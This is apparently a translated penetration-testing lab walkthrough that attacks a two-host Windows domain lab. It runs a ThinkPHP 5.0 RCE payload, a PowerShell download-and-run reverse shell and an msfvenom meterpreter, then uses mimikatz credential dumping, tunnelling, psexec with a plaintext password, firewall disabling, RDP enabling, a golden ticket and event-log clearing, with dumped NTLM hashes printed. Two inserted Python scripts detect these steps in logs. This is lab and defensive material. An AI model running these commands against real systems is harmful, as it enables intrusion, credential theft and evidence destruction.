Lab download: http://vulnstack.qiyuanxuetang.net/vuln/detail/7/
Environment setup:
Win7: Win7 acts as the web server and has two NICs, one on the internal network and one on the external network:
    Internal IP: 192.168.138.136
    External IP: 192.168.135.150
    Note: phpstudy has to be started manually
Windows 2008: Windows 2008 has a single NIC, sits on the internal network and cannot reach the external network:
Attacker machine:
The VMnet2 NIC is configured as follows:
External penetration:
Opening the web page shows that the site runs ThinkPHP 5.0; a quick search online turns up plenty of payloads for it:
    ?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
Fire the payload found online:
RCE succeeded. Next, use powercat to get a reverse shell:
    ?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://192.168.135.128:1235/powercat.ps1');powercat -c 192.168.135.128 -p 1234 -e cmd.exe
Reverse shell received.
Next, use metasploit to build an exe, download it onto the target and run it there to get a meterpreter session back:
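As an added example (my code, not part of the original write-up), a small Python detector for the ThinkPHP 5.0 invokefunction RCE pattern in web access logs. The log lines are constructed to mirror the requests above, the function names are mine, and it decodes and lower-cases the route so that `%5Cthink%5CApp` and `\think\app` are treated alike; on the mitigation side, the router fix shipped in ThinkPHP 5.0.23, so anything older should be upgraded.

```python
import re
from urllib.parse import parse_qs

# Constructed Apache-style access-log lines (not from the page); the first two mirror the
# request shape shown in this write-up, the third is ordinary ThinkPHP traffic.
SAMPLE_LINES = [
    r'192.168.135.128 - - [08/Nov/2022:13:10:01 +0800] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 200 512',
    r'192.168.135.128 - - [08/Nov/2022:13:10:05 +0800] "GET /index.php?s=%2FIndex%2F%5Cthink%5CApp%2Finvokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=powershell.exe+IEX(...) HTTP/1.1" 200 9000',
    r'10.0.0.7 - - [08/Nov/2022:13:11:00 +0800] "GET /index.php?s=/index/user/login HTTP/1.1" 200 2048',
]

# Minimal combined-log-format parser: source address, timestamp, method, URL, status.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

def analyze_line(line):
    """Return an alert dict if the request abuses ThinkPHP's invokefunction route, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("url").partition("?")
    params = parse_qs(query, keep_blank_values=True)          # decodes %5C, %2F, '+' etc.
    route = (path + " " + params.get("s", [""])[0]).lower()   # PATHINFO or ?s= routing
    # The unpatched 5.0.x router lets a request name an arbitrary class such as \think\app;
    # a legitimate route never contains a namespaced class followed by invokefunction.
    if "\\think\\" not in route or "invokefunction" not in route:
        return None
    args = [v for k, vs in params.items() if k.startswith("vars[") for v in vs]
    return {
        "src": m.group("src"),
        "time": m.group("ts"),
        "status": m.group("status"),
        "function": params.get("function", [""])[0],
        "args": args,
    }

def scan(lines):
    """Run analyze_line over an iterable of log lines and collect the alerts."""
    return [hit for hit in map(analyze_line, lines) if hit]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LINES):
        print(alert)
```

A 200 status on a flagged line is the signal that the call went through; the `args` field shows what was passed to `system`, which is the first thing to pivot on during triage.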
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.135.128 LPORT=1236 -f exe -o shell.exe
Start the msf listener, then run the downloaded trojan from the shell we already have to get meterpreter:
Internal network information gathering:
Running getsystem in meterpreter gives us SYSTEM privileges.
    net view                               # list other host names on the LAN
    net config Workstation                 # computer name, full name, user name, OS version, workstation, domain, logon domain
    net user                               # local user list
    net user /domain                       # domain users
    net localgroup administrators          # local administrators group (often contains domain users)
    net view /domain                       # how many domains there are
    net user <username> /domain            # details of a given domain user
    net group /domain                      # groups in the domain, i.e. how the users are grouped (only works on the DC)
    net time /domain                       # find the primary domain; the PDC usually acts as time server
    net group <groupname> /domain          # members of a given domain group
    net group "domain admins" /domain      # names of the domain admins
    net group "domain computers" /domain   # other host names in the domain
    net group "domain controllers" /domain # domain controller host names (there may be several)
    ipconfig /all                          # local IP range, domain membership, etc.
Running ipconfig /all shows that the web server's internal IP is 192.168.138.136 and its DNS server is 192.168.138.138:
The host at 192.168.138.138 should therefore be the DC. The ipconfig /all output also shows that the current domain is sun.com, and we can tell that the user behind the shell we obtained at the start is a domain admin:
The users in the domain:
The hosts on the internal network:
Check how many domains there are:
Because the mimikatz bundled with msf never works reliably, we upload our own copy and use it to grab the passwords:
Dump the system passwords:
    mimikatz.exe
    privilege::debug            # elevate privileges
    sekurlsa::logonPasswords    # dump plaintext credentials
The domain admin's account and password:
Domain user leo's account and password:
Route forwarding and covert communication tunnel
Next, we use EarthWorm to build a covert communication tunnel. First upload ew_for_Win.exe to Win7, then set up the tunnel:
    ./ew_for_linux64 -s rcsocks -l 1238 -e 1237            (run on the attacker machine)
    ew_for_Win.exe -s rssocks -d 192.168.135.128 -e 1237   (run on the target)
Tunnel established:
Edit proxychains4.conf and add the following proxy:
Also remember to comment out proxy_dns.
Next, run nmap through the new proxy with proxychains4 to scan 192.168.138.138:
    proxychains4 nmap -sS -sV -sC -A -p- --min-rate 5000 192.168.138.138

    Nmap scan report for 192.168.138.138
    Host is up (0.0024s latency).
    Not shown: 65516 filtered ports
    PORT      STATE SERVICE      VERSION
    25/tcp    open  tcpwrapped
    |_smtp-commands: Couldn't establish connection on port 25
    53/tcp    open  domain       Microsoft DNS 6.1.7600 (1DB04001) (Windows Server 2008 R2)
    | dns-nsid:
    |_  bind.version: Microsoft DNS 6.1.7600 (1DB04001)
    110/tcp   open  tcpwrapped
    135/tcp   open  msrpc        Microsoft Windows RPC
    139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
    389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: sun.com, Site: Default-First-Site-Name)
    445/tcp   open  microsoft-ds Windows Server 2008 HPC Edition 7600 microsoft-ds (workgroup: SUN)
    3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: sun.com, Site: Default-First-Site-Name)
    3269/tcp  open  tcpwrapped
    47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
    |_http-server-header: Microsoft-HTTPAPI/2.0
    |_http-title: Not Found
    49152/tcp open  msrpc        Microsoft Windows RPC
    49153/tcp open  msrpc        Microsoft Windows RPC
    49154/tcp open  msrpc        Microsoft Windows RPC
    49157/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
    49158/tcp open  msrpc        Microsoft Windows RPC
    49160/tcp open  msrpc        Microsoft Windows RPC
    49168/tcp open  msrpc        Microsoft Windows RPC
    49173/tcp open  msrpc        Microsoft Windows RPC
    49226/tcp open  msrpc        Microsoft Windows RPC
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Microsoft Windows XP|7|2012
    OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012
    OS details: Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012
    Network Distance: 2 hops
    Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2, cpe:/o:microsoft:windows

    Host script results:
    |_clock-skew: mean: -2h39m55s, deviation: 4h36m58s, median: -1s
    |_nbstat: NetBIOS name: DC, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:92:68:89 (VMware)
    | smb-os-discovery:
    |   OS: Windows Server 2008 HPC Edition 7600 (Windows Server 2008 HPC Edition 6.1)
    |   OS CPE: cpe:/o:microsoft:windows_server_2008::-
    |   Computer name: DC
    |   NetBIOS computer name: DC\x00
    |   Domain name: sun.com
    |   Forest name: sun.com
    |   FQDN: DC.sun.com
    |_  System time: 2022-11-08T01:37:00+08:00
    | smb-security-mode:
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: required
    | smb2-security-mode:
    |   2.02:
    |_    Message signing enabled and required
    | smb2-time:
    |   date: 2022-11-07T17:37:00
    |_  start_date: 2022-11-07T16:39:34

    TRACEROUTE (using port 25/tcp)
    HOP RTT     ADDRESS
    1   3.57 ms 192.168.135.2
    2   3.58 ms 192.168.138.138

    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 277.66 seconds
Port 445 is open. An attempt with ms17_010 failed, but since we already hold the domain admin's account and password we try psexec to log in to the DC directly, without setting up an IPC$ session first.
psexec login to the DC:
    use exploit/windows/smb/psexec
    set rhosts 192.168.138.138
    set SMBDomain SUN
    set SMBUser Administrator
    set SMBPass dc123.com
    set payload windows/meterpreter/bind_tcp   # routing is already in place and the DC has no outbound access, so use a bind payload
    set lport 1239
The login did not succeed; the firewall is probably on, so we try to turn it off:
First set up an IPC$ connection from Win7 to Windows 2008:
    net use \\192.168.138.138\ipc$ "dc123.com" /user:"Administrator"
Then use sc to create a service and run the command remotely through it:
    sc \\192.168.138.138 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
    sc \\192.168.138.138 start unablefirewall
Now run the psexec module against the DC again:
Login succeeded. The earlier nmap scan of the DC did not show port 3389 open; once inside, run netstat -ano to check:
Port 3389 is indeed not listening. First check whether RDP is enabled at all:
    REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
    # check whether the RDP service is enabled: 1 = disabled, 0 = enabled
RDP is disabled, so we enable it:
    REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
Because we have already turned the firewall off, there is no need to add a firewall rule allowing port 3389 here. Check the listening ports again:
Next, log in to the DC's remote desktop through the tunnel:
Login successful:
Persistence
Golden ticket
First obtain the krbtgt NTLM hash and the domain SID:
    mimikatz # lsadump::lsa /patch
    Domain : SUN / S-1-5-21-3388020223-1982701712-4030140183

    RID  : 000001f4 (500)
    User : Administrator
    LM   :
    NTLM : 8c535a2d84c3b21059d667639bb89db5

    RID  : 000001f5 (501)
    User : Guest
    LM   :
    NTLM :

    RID  : 000001f6 (502)
    User : krbtgt
    LM   :
    NTLM : 65dc23a67f31503698981f2665f9d858

    RID  : 000003e8 (1000)
    User : admin
    LM   :
    NTLM : 8c535a2d84c3b21059d667639bb89db5

    RID  : 00000456 (1110)
    User : leo
    LM   :
    NTLM : afffeba176210fad4628f0524bfe1942

    RID  : 000003e9 (1001)
    User : DC$
    LM   :
    NTLM : 7178f86541258a83bf19728f010c64da

    RID  : 00000451 (1105)
    User : WIN7$
    LM   :
    NTLM : dc1cbe1583c92a3740cfcd97e8f0a377
On Win7, first purge the ticket cache:
Generate the golden ticket and inject it into memory:
Run klist to view the tickets:
Trace cleanup
View the event logs:
Clear the event logs (all six log types)
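Added example (my code, not from the write-up): one Python detection pass over constructed Windows event records that covers the three defender-visible steps of this section, the service created with sc to turn the firewall off (System event 7045), the fDenyTSConnections change that enables RDP (Security event 4657, which is only written when registry auditing and a SACL on that key are in place), and the event-log clearing at the end (1102 for the Security log, 104 for the System and Application logs). The service name and command line come from the page; host name, user and field layout are assumptions.

```python
import re

# Constructed Windows event records in the flat form a SIEM exports (not from the page).
# The service name, its command line and the registry value mirror this write-up's steps;
# every other field (host name, user, channel layout) is an assumption.
SAMPLE_EVENTS = [
    {"EventID": 7045, "Channel": "System", "Computer": "DC.sun.com",
     "ServiceName": "unablefirewall",
     "ImagePath": "netsh advfirewall set allprofiles state off"},
    {"EventID": 7045, "Channel": "System", "Computer": "DC.sun.com",
     "ServiceName": "Spooler", "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
    {"EventID": 4657, "Channel": "Security", "Computer": "DC.sun.com",
     "ObjectName": r"\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server",
     "ObjectValueName": "fDenyTSConnections", "OldValue": "1", "NewValue": "0"},
    {"EventID": 1102, "Channel": "Security", "Computer": "DC.sun.com",
     "SubjectUserName": "Administrator"},
    {"EventID": 104, "Channel": "System", "Computer": "DC.sun.com",
     "SubjectUserName": "Administrator"},
]

FIREWALL_OFF = re.compile(r"netsh\s+advfirewall\s+set\s+\w+\s+state\s+off", re.I)
# A service whose image is a shell or admin utility instead of a service binary is the
# footprint of remote command execution through 'sc create' or psexec-style tooling.
LOLBIN_SERVICE = re.compile(r"^(cmd|powershell|netsh|reg|rundll32|regsvr32)(\.exe)?\b", re.I)

def check_event(ev):
    """Return (severity, message) when the record matches one of the rules, else None."""
    eid = ev.get("EventID")
    if eid == 7045:  # System log: a new service was installed
        image = ev.get("ImagePath", "").strip('"')
        if FIREWALL_OFF.search(image):
            return ("high", f"service '{ev['ServiceName']}' turns the host firewall off")
        if LOLBIN_SERVICE.match(image):
            return ("medium", f"service '{ev['ServiceName']}' runs a utility, not a binary: {image}")
    # 4657 is only written when 'Audit Registry' is on and the key carries a SACL.
    if eid == 4657 and ev.get("ObjectValueName", "").lower() == "fdenytsconnections" \
            and ev.get("NewValue") == "0":
        return ("high", f"RDP enabled through the registry on {ev['Computer']}")
    if eid in (1102, 104):  # 1102: Security log cleared; 104: System/Application log cleared
        return ("high", f"{ev['Channel']} log cleared by {ev.get('SubjectUserName')} on {ev['Computer']}")
    return None

def scan_events(events):
    """Apply check_event to every record and return the hits as (EventID, severity, message)."""
    return [(ev["EventID"], *hit) for ev in events if (hit := check_event(ev))]

if __name__ == "__main__":
    for eid, severity, message in scan_events(SAMPLE_EVENTS):
        print(f"[{severity}] {eid}: {message}")
```

Forwarding these channels off the host before they can be cleared is what makes the last rule useful; a 1102 or 104 that arrives with no preceding alerts is itself the alert.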